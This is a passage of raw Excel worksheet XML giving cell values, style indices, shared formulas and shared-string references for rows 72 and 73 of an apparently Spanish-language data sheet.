        <v>3.0</v>
      </c>
      <c r="GG72" s="112">
        <v>15.0</v>
      </c>
      <c r="GH72" s="113">
        <f t="shared" si="139"/>
        <v>4</v>
      </c>
      <c r="GI72" s="113">
        <f t="shared" si="140"/>
        <v>4</v>
      </c>
      <c r="GJ72" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK72" s="113">
        <f t="shared" si="142"/>
        <v>16</v>
      </c>
      <c r="GL72" s="113">
        <f t="shared" si="143"/>
        <v>14</v>
      </c>
      <c r="GM72" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN72" s="113">
        <f t="shared" si="145"/>
        <v>31</v>
      </c>
      <c r="GO72" s="113">
        <f t="shared" si="146"/>
        <v>15</v>
      </c>
      <c r="GP72" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ72" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR72" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS72" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT72" s="94" t="s">
        <v>1394</v>
      </c>
      <c r="GU72" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV72" s="116">
        <v>1.0</v>
      </c>
      <c r="GW72" s="116">
        <v>2.0</v>
      </c>
      <c r="GX72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD72" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE72" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF72" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG72" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH72" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI72" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ72" s="93" t="s">
        <v>1395</v>
      </c>
      <c r="HK72" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL72" s="93">
        <v>7.0</v>
      </c>
      <c r="HM72" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN72" s="93">
        <v>0.0</v>
      </c>
      <c r="HO72" s="93">
        <v>0.0</v>
      </c>
      <c r="HP72" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ72" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR72" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS72" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT72" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU72" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV72" s="148">
        <v>33515.0</v>
      </c>
      <c r="HW72" s="119">
        <v>1.0</v>
      </c>
      <c r="HX72" s="119">
        <v>1.0</v>
      </c>
      <c r="HY72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC72" s="120">
        <f t="shared" si="151"/>
        <v>33515</v>
      </c>
      <c r="ID72" s="120">
        <v>33515.0</v>
      </c>
      <c r="IE72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH72" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II72" s="99" t="s">
        <v>1396</v>
      </c>
      <c r="IJ72" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK72" s="99">
        <v>0.0</v>
      </c>
      <c r="IL72" s="99">
        <v>1.0</v>
      </c>
      <c r="IM72" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN72" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO72" s="98">
        <v>2.0</v>
      </c>
      <c r="IP72" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ72" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR72" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS72" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT72" s="127"/>
      <c r="IU72" s="127"/>
      <c r="IV72" s="127"/>
      <c r="IW72" s="127"/>
      <c r="IX72" s="127"/>
      <c r="IY72" s="127"/>
      <c r="IZ72" s="127"/>
      <c r="JA72" s="127"/>
      <c r="JB72" s="127"/>
      <c r="JC72" s="127"/>
      <c r="JD72" s="127"/>
      <c r="JE72" s="127"/>
      <c r="JF72" s="127"/>
      <c r="JG72" s="127"/>
      <c r="JH72" s="127"/>
      <c r="JI72" s="127"/>
      <c r="JJ72" s="127"/>
      <c r="JK72" s="127"/>
      <c r="JL72" s="127"/>
      <c r="JM72" s="127"/>
      <c r="JN72" s="127"/>
      <c r="JO72" s="127"/>
      <c r="JP72" s="127"/>
      <c r="JQ72" s="127"/>
      <c r="JR72" s="127"/>
      <c r="JS72" s="127"/>
      <c r="JT72" s="127"/>
      <c r="JU72" s="127"/>
      <c r="JV72" s="127"/>
      <c r="JW72" s="127"/>
      <c r="JX72" s="127"/>
      <c r="JY72" s="127"/>
      <c r="JZ72" s="127"/>
      <c r="KA72" s="127"/>
      <c r="KB72" s="127"/>
      <c r="KC72" s="127"/>
      <c r="KD72" s="127"/>
      <c r="KE72" s="127"/>
      <c r="KF72" s="127"/>
      <c r="KG72" s="127"/>
      <c r="KH72" s="127"/>
      <c r="KI72" s="127"/>
      <c r="KJ72" s="127"/>
      <c r="KK72" s="127"/>
      <c r="KL72" s="127"/>
      <c r="KM72" s="127"/>
      <c r="KN72" s="127"/>
      <c r="KO72" s="127"/>
      <c r="KP72" s="127"/>
      <c r="KQ72" s="127"/>
      <c r="KR72" s="127"/>
      <c r="KS72" s="127"/>
      <c r="KT72" s="127"/>
      <c r="KU72" s="127"/>
      <c r="KV72" s="127"/>
      <c r="KW72" s="127"/>
      <c r="KX72" s="127"/>
      <c r="KY72" s="127"/>
      <c r="KZ72" s="127"/>
      <c r="LA72" s="127"/>
      <c r="LB72" s="127"/>
      <c r="LC72" s="127"/>
      <c r="LD72" s="127"/>
      <c r="LE72" s="127"/>
      <c r="LF72" s="127"/>
      <c r="LG72" s="127"/>
      <c r="LH72" s="127"/>
      <c r="LI72" s="127"/>
      <c r="LJ72" s="127"/>
      <c r="LK72" s="127"/>
      <c r="LL72" s="127"/>
      <c r="LM72" s="127"/>
      <c r="LN72" s="127"/>
      <c r="LO72" s="127"/>
      <c r="LP72" s="127"/>
      <c r="LQ72" s="127"/>
      <c r="LR72" s="127"/>
      <c r="LS72" s="127"/>
      <c r="LT72" s="127"/>
      <c r="LU72" s="127"/>
      <c r="LV72" s="127"/>
      <c r="LW72" s="127"/>
      <c r="LX72" s="127"/>
      <c r="LY72" s="127"/>
      <c r="LZ72" s="127"/>
      <c r="MA72" s="127"/>
      <c r="MB72" s="127"/>
      <c r="MC72" s="127"/>
      <c r="MD72" s="127"/>
      <c r="ME72" s="127"/>
      <c r="MF72" s="127"/>
      <c r="MG72" s="127"/>
      <c r="MH72" s="127"/>
      <c r="MI72" s="127"/>
      <c r="MJ72" s="127"/>
      <c r="MK72" s="127"/>
      <c r="ML72" s="127"/>
      <c r="MM72" s="127"/>
      <c r="MN72" s="127"/>
      <c r="MO72" s="127"/>
      <c r="MP72" s="127"/>
      <c r="MQ72" s="127"/>
      <c r="MR72" s="127"/>
      <c r="MS72" s="127"/>
      <c r="MT72" s="127"/>
      <c r="MU72" s="127"/>
      <c r="MV72" s="127"/>
      <c r="MW72" s="127"/>
      <c r="MX72" s="127"/>
      <c r="MY72" s="127"/>
      <c r="MZ72" s="127"/>
      <c r="NA72" s="127"/>
      <c r="NB72" s="127"/>
      <c r="NC72" s="127"/>
      <c r="ND72" s="127"/>
      <c r="NE72" s="127"/>
      <c r="NF72" s="127"/>
      <c r="NG72" s="127"/>
      <c r="NH72" s="127"/>
      <c r="NI72" s="127"/>
      <c r="NJ72" s="127"/>
      <c r="NK72" s="127"/>
      <c r="NL72" s="127"/>
      <c r="NM72" s="127"/>
      <c r="NN72" s="127"/>
      <c r="NO72" s="127"/>
      <c r="NP72" s="127"/>
      <c r="NQ72" s="127"/>
      <c r="NR72" s="127"/>
      <c r="NS72" s="127"/>
      <c r="NT72" s="127"/>
      <c r="NU72" s="127"/>
      <c r="NV72" s="127"/>
      <c r="NW72" s="127"/>
      <c r="NX72" s="127"/>
      <c r="NY72" s="127"/>
    </row>
    <row r="73" ht="153.75" customHeight="1">
      <c r="B73" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C73" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D73" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E73" s="90" t="s">
        <v>1397</v>
      </c>
      <c r="F73" s="90" t="s">
        <v>1398</v>
      </c>
      <c r="G73" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H73" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I73" s="92" t="s">
        <v>1399</v>
      </c>
      <c r="J73" s="92" t="s">
        <v>1400</v>
      </c>
      <c r="K73" s="92" t="s">
        <v>1401</v>
      </c>
      <c r="L73" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M73" s="93">
        <v>13.0</v>
      </c>
      <c r="N73" s="93">
        <v>1.0</v>
      </c>
      <c r="O73" s="93">
        <v>0.0</v>
      </c>
      <c r="P73" s="93">
        <v>1.0</v>
      </c>
      <c r="Q73" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R73" s="93">
        <v>1.0</v>
      </c>
      <c r="S73" s="93">
        <v>0.0</v>
      </c>
      <c r="T73" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U73" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V73" s="126" t="s">
        <v>1402</v>
      </c>
      <c r="W73" s="160" t="s">
        <v>1403</v>
      </c>
      <c r="X73" s="97" t="s">
        <v>1404</v>
      </c>
      <c r="Y73" s="126" t="s">
        <v>1405</v>
      </c>
      <c r="Z73" s="96" t="s">
        <v>1406</v>
      </c>
      <c r="AA73" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB73" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC73" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD73" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE73" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF73" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG73" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH73" s="99" t="s">
        <v>1407</v>
      </c>
      <c r="AI73" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ73" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK73" s="100">
        <v>254.0</v>
      </c>
      <c r="AL73" s="100">
        <v>1.0</v>
      </c>
      <c r="AM73" s="100">
        <v>2.0</v>
      </c>
      <c r="AN73" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO73" s="100">
        <v>254.0</v>
      </c>
      <c r="AP73" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ73" s="100">
        <v>2.0</v>
      </c>
      <c r="AR73" s="100">
        <v>254.0</v>
      </c>
      <c r="AS73" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT73" s="100">
        <f t="shared" si="149"/>
        <v>254</v>
      </c>
      <c r="AU73" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV73" s="100">
        <v>254.0</v>
      </c>
      <c r="AW73" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX73" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY73" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ73" s="100">
        <v>0.0</v>
      </c>
      <c r="BA73" s="102">
        <v>13.0</v>
      </c>
      <c r="BB73" s="102">
        <v>2.0</v>
      </c>
      <c r="BC73" s="102">
        <v>2.0</v>
      </c>
      <c r="BD73" s="102">
        <v>2.0</v>
      </c>
      <c r="BE73" s="102">
        <v>0.0</v>
      </c>
      <c r="BF73" s="102">
        <v>0.0</v>
      </c>
      <c r="BG73" s="102">
        <v>0.0</v>
      </c>
      <c r="BH73" s="102">
        <v>0.0</v>
      </c>
      <c r="BI73" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ73" s="102">
        <v>2.0</v>
      </c>
      <c r="BK73" s="102">
        <v>2.0</v>
      </c>
      <c r="BL73" s="103">
        <f t="shared" si="112"/>
        <v>2</v>
      </c>
      <c r="BM73" s="103">
        <f t="shared" si="113"/>
        <v>2</v>
      </c>
      <c r="BN73" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO73" s="103">
        <f t="shared" si="115"/>
        <v>2</v>
      </c>
      <c r="BP73" s="103">
        <f t="shared" si="116"/>
        <v>2</v>
      </c>
      <c r="BQ73" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR73" s="103">
        <f t="shared" si="118"/>
        <v>2</v>
      </c>
      <c r="BS73" s="103">
        <f t="shared" si="119"/>
        <v>2</v>
      </c>
      <c r="BT73" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU73" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV73" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW73" s="104">
        <v>254.0</v>
      </c>
      <c r="BX73" s="104">
        <v>1.0</v>
      </c>
      <c r="BY73" s="104">
        <v>2.0</v>
      </c>
      <c r="BZ73" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA73" s="104">
        <v>254.0</v>
      </c>
      <c r="CB73" s="104">
        <v>1.0</v>
      </c>
      <c r="CC73" s="104">
        <v>2.0</v>
      </c>
      <c r="CD73" s="104">
        <v>254.0</v>
      </c>
      <c r="CE73" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF73" s="104">
        <f t="shared" si="121"/>
        <v>254</v>
      </c>
      <c r="CG73" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH73" s="104">
        <v>254.0</v>
      </c>
      <c r="CI73" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ73" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK73" s="104">
        <v>0.0</v>
      </c>
      <c r="CL73" s="104">
        <v>0.0</v>
      </c>
      <c r="CM73" s="105">
        <v>11.0</v>
      </c>
      <c r="CN73" s="105">
        <v>2.0</v>
      </c>
      <c r="CO73" s="105">
        <v>2.0</v>
      </c>
      <c r="CP73" s="105">
        <v>2.0</v>
      </c>
      <c r="CQ73" s="105">
        <v>0.0</v>
      </c>
      <c r="CR73" s="105">
        <v>2.0</v>
      </c>
      <c r="CS73" s="105">
        <v>0.0</v>
      </c>
      <c r="CT73" s="105">
        <v>0.0</v>
      </c>
      <c r="CU73" s="105">
        <v>0.0</v>
      </c>
      <c r="CV73" s="105">
        <v>0.0</v>
      </c>
      <c r="CW73" s="105">
        <v>2.0</v>
      </c>
      <c r="CX73" s="105">
        <v>2.0</v>
      </c>
      <c r="CY73" s="105">
        <v>2.0</v>
      </c>
      <c r="CZ73" s="105">
        <v>0.0</v>
      </c>
      <c r="DA73" s="105">
        <v>2.0</v>
      </c>
      <c r="DB73" s="106">
        <f t="shared" si="122"/>
        <v>2</v>
      </c>
      <c r="DC73" s="106">
        <f t="shared" si="123"/>
        <v>2</v>
      </c>
      <c r="DD73" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE73" s="106">
        <f t="shared" si="125"/>
        <v>2</v>
      </c>
      <c r="DF73" s="106">
        <f t="shared" si="126"/>
        <v>2</v>
      </c>
      <c r="DG73" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH73" s="106">
        <f t="shared" si="127"/>
        <v>2</v>
      </c>
      <c r="DI73" s="106">
        <f t="shared" si="128"/>
        <v>2</v>
      </c>
      <c r="DJ73" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK73" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL73" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM73" s="108">
        <v>254.0</v>
      </c>
      <c r="DN73" s="108">
        <v>1.0</v>
      </c>
      <c r="DO73" s="108">
        <v>2.0</v>
      </c>
      <c r="DP73" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ73" s="108">
        <v>254.0</v>
      </c>
      <c r="DR73" s="108">
        <v>1.0</v>
      </c>
      <c r="DS73" s="108">
        <v>2.0</v>
      </c>
      <c r="DT73" s="108">
        <v>254.0</v>
      </c>
      <c r="DU73" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV73" s="108">
        <f t="shared" si="150"/>
        <v>254</v>
      </c>
      <c r="DW73" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX73" s="108">
        <v>254.0</v>
      </c>
      <c r="DY73" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ73" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA73" s="108">
        <v>0.0</v>
      </c>
      <c r="EB73" s="108">
        <v>0.0</v>
      </c>
      <c r="EC73" s="109">
        <v>13.0</v>
      </c>
      <c r="ED73" s="109">
        <v>2.0</v>
      </c>
      <c r="EE73" s="109">
        <v>2.0</v>
      </c>
      <c r="EF73" s="109">
        <v>2.0</v>
      </c>
      <c r="EG73" s="109">
        <v>0.0</v>
      </c>
      <c r="EH73" s="109">
        <v>2.0</v>
      </c>
      <c r="EI73" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ73" s="109">
        <v>0.0</v>
      </c>
      <c r="EK73" s="109">
        <v>0.0</v>
      </c>
      <c r="EL73" s="109">
        <v>0.0</v>
      </c>
      <c r="EM73" s="109">
        <v>2.0</v>
      </c>
      <c r="EN73" s="109">
        <v>2.0</v>
      </c>
      <c r="EO73" s="109">
        <v>2.0</v>
      </c>
      <c r="EP73" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ73" s="109">
        <v>2.0</v>
      </c>
      <c r="ER73" s="110">
        <f t="shared" si="130"/>
        <v>2</v>
      </c>
      <c r="ES73" s="110">
        <f t="shared" si="131"/>
        <v>2</v>
      </c>
      <c r="ET73" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU73" s="110">
        <f t="shared" si="133"/>
        <v>2</v>
      </c>
      <c r="EV73" s="110">
        <f t="shared" si="134"/>
        <v>2</v>
      </c>
      <c r="EW73" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX73" s="110">
        <f t="shared" si="136"/>
        <v>2</v>
      </c>
      <c r="EY73" s="110">
        <f t="shared" si="137"/>
        <v>2</v>
      </c>
      <c r="EZ73" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA73" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB73" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC73" s="111" t="s">
        <v>1408</v>
      </c>
      <c r="FD73" s="111">
        <v>3.0</v>
      </c>
      <c r="FE73" s="111">
        <v>10.0</v>
      </c>
      <c r="FF73" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG73" s="111">
        <v>254.0</v>
      </c>
      <c r="FH73" s="111">
        <v>1.0</v>
      </c>
      <c r="FI73" s="111">
        <v>2.0</v>
      </c>
      <c r="FJ73" s="111" t="s">
        <v>1408</v>
      </c>
      <c r="FK73" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL73" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 254</v>
      </c>
      <c r="FM73" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN73" s="111" t="s">
        <v>1408</v>
      </c>
      <c r="FO73" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP73" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ73" s="111">
        <v>0.0</v>
      </c>
      <c r="FR73" s="111">
        <v>0.0</v>
      </c>
      <c r="FS73" s="112">
        <v>11.0</v>
      </c>
      <c r="FT73" s="112">
        <v>4.0</v>
      </c>
      <c r="FU73" s="112">
        <v>6.0</v>
      </c>
      <c r="FV73" s="112">
        <v>2.0</v>
      </c>
      <c r="FW73" s="112">
        <v>10.0</v>
      </c>
      <c r="FX73" s="112">
        <v>12.0</v>
      </c>
      <c r="FY73" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ73" s="112">
        <v>0.0</v>
      </c>
      <c r="GA73" s="112">
        <v>0.0</v>
      </c>
      <c r="GB73" s="112">
        <v>0.0</v>
      </c>
      <c r="GC73" s="112">
        <v>2.0</v>
      </c>
      <c r="GD73" s="112">
        <v>2.0</v>
      </c>
      <c r="GE73" s="112">
        <v>2.0</v>
      </c>
      <c r="GF73" s="112">
        <v>0.0</v>
      </c>
      <c r="GG73" s="112">
        <v>2.0</v>
      </c>
      <c r="GH73" s="113">
        <f t="shared" si="139"/>
        <v>4</v>
      </c>
      <c r="GI73" s="113">
        <f t="shared" si="140"/>
        <v>2</v>
      </c>
      <c r="GJ73" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK73" s="113">
        <f t="shared" si="142"/>
        <v>6</v>
      </c>
      <c r="GL73" s="113">
        <f t="shared" si="143"/>
        <v>2</v>
      </c>
      <c r="GM73" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN73" s="113">
        <f t="shared" si="145"/>
        <v>12</v>
      </c>
      <c r="GO73" s="113">
        <f t="shared" si="146"/>
        <v>2</v>
      </c>
      <c r="GP73" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ73" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR73" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS73" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT73" s="94" t="s">
        <v>1409</v>
      </c>
      <c r="GU73" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV73" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW73" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF73" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG73" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH73" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI73" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ73" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK73" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL73" s="93">
        <v>11.0</v>
      </c>
      <c r="HM73" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN73" s="93">
        <v>0.0</v>
      </c>
      <c r="HO73" s="93">
        <v>0.0</v>
      </c>
      <c r="HP73" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ73" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR73" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS73" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT73" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU73" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV73" s="119" t="s">
        <v>1410</v>
      </c>
      <c r="HW73" s="119">
        <v>2.0</v>
      </c>
      <c r="HX73" s="119">
        <v>4.0</v>
      </c>
      <c r="HY73" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ73" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA73" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB73" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC73" s="120">
        <v>6.32447088E8</v>
      </c>
      <c r="ID73" s="120">
        <v>6.32447088E8</v>
      </c>
      <c r="IE73" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF73" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG73" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH73" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II73" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ73" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK73" s="99">
        <v>9.0</v>
      </c>
      <c r="IL73" s="99">
        <v>1.0</v>
      </c>
      <c r="IM73" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN73" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO73" s="98">
        <v>1.0</v>
      </c>
      <c r="IP73" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ73" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR73" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS73" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT73" s="127"/>
      <c r="IU73" s="127"/>
      <c r="IV73" s="127"/>
      <c r="IW73" s="127"/>
      <c r="IX73" s="127"/>
      <c r="IY73" s="127"/>
      <c r="IZ73" s="127"/>
      <c r="JA73" s="127"/>
      <c r="JB73" s="127"/>
      <c r="JC73" s="127"/>
      <c r="JD73" s="127"/>
      <c r="JE73" s="127"/>
      <c r="JF73" s="127"/>
      <c r="JG73" s="127"/>
      <c r="JH73" s="127"/>
      <c r="JI73" s="127"/>
      <c r="JJ73" s="127"/>
      <c r="JK73" s="127"/>
      <c r="JL73" s="127"/>
      <c r="JM73" s="127"/>
      <c r="JN73" s="127"/>
      <c r="JO73" s="127"/>
      <c r="JP73" s="127"/>
      <c r="JQ73" s="127"/>
      <c r="JR73" s="127"/>
      <c r="JS73" s="127"/>
      <c r="JT73" s="127"/>
      <c r="JU73" s="127"/>
      <c r="JV73" s="127"/>
      <c r="JW73" s="127"/>
      <c r="JX73" s="127"/>
      <c r="JY73" s="127"/>
      <c r="JZ73" s="127"/>
      <c r="KA73" s="127"/>
      <c r="KB73" s="127"/>
      <c r="KC73" s="127"/>
      <c r="KD73" s="127"/>
      <c r="KE73" s="127"/>
      <c r="KF73" s="127"/>
      <c r="KG73" s="127"/>
      <c r="KH73" s="127"/>
      <c r="KI73" s="127"/>
      <c r="KJ73" s="127"/>
      <c r="KK73" s="127"/>
      <c r="KL73" s="127"/>
      <c r="KM73" s="127"/>
      <c r="KN73" s="127"/>
      <c r="KO73" s="127"/>
      <c r="KP73" s="127"/>
      <c r="KQ73" s="127"/>
      <c r="KR73" s="127"/>
      <c r="KS73" s="127"/>
      <c r="KT73" s="127"/>
      <c r="KU73" s="127"/>
      <c r="KV73" s="127"/>
      <c r="KW73" s="127"/>
      <c r="KX73" s="127"/>
      <c r="KY73" s="127"/>
      <c r="KZ73" s="127"/>
      <c r="LA73" s="127"/>
      <c r="LB73" s="127"/>
      <c r="LC73" s="127"/>
      <c r="LD73" s="127"/>
      <c r="LE73" s="127"/>
      <c r="LF73" s="127"/>
      <c r="LG73" s="127"/>
      <c r="LH73" s="127"/>
      <c r="LI73" s="127"/>
      <c r="LJ73" s="127"/>
      <c r="LK73" s="127"/>
      <c r="LL73" s="127"/>
      <c r="LM73" s="127"/>
      <c r="LN73" s="127"/>
      <c r="LO73" s="127"/>
      <c r="LP73" s="127"/>
      <c r="LQ73" s="127"/>
      <c r="LR73" s="127"/>
      <c r="LS73" s="127"/>
      <c r="LT73" s="127"/>
      <c r="LU73" s="127"/>
      <c r="LV73" s="127"/>
      <c r="LW73" s="127"/>
      <c r="LX73" s="127"/>
      <c r="LY73" s="127"/>
      <c r="LZ73" s="127"/>
      <c r="MA73" s="127"/>
      <c r="MB73" s="127"/>
      <c r="MC73" s="127"/>
      <c r="MD73" s="127"/>
      <c r="ME73" s="127"/>
      <c r="MF73" s="127"/>
      <c r="MG73" s="127"/>
      <c r="MH73" s="127"/>
      <c r="MI73" s="127"/>
      <c r="MJ73" s="127"/>
      <c r="MK73" s="127"/>
      <c r="ML73" s="127"/>
      <c r="MM73" s="127"/>
      <c r="MN73" s="127"/>
      <c r="MO73" s="127"/>
      <c r="MP73" s="127"/>
      <c r="MQ73" s="127"/>
      <c r="MR73" s="127"/>
      <c r="MS73" s="127"/>
      <c r="MT73" s="127"/>
      <c r="MU73" s="127"/>
      <c r="MV73" s="127"/>
      <c r="MW73" s="127"/>
      <c r="MX73" s="127"/>
      <c r="MY73" s="127"/>
      <c r="MZ73" s="127"/>
      <c r="NA73" s="127"/>
      <c r="NB73" s="127"/>
      <c r="NC73" s="127"/>
      <c r="ND73" s="127"/>
      <c r="NE73" s="127"/>
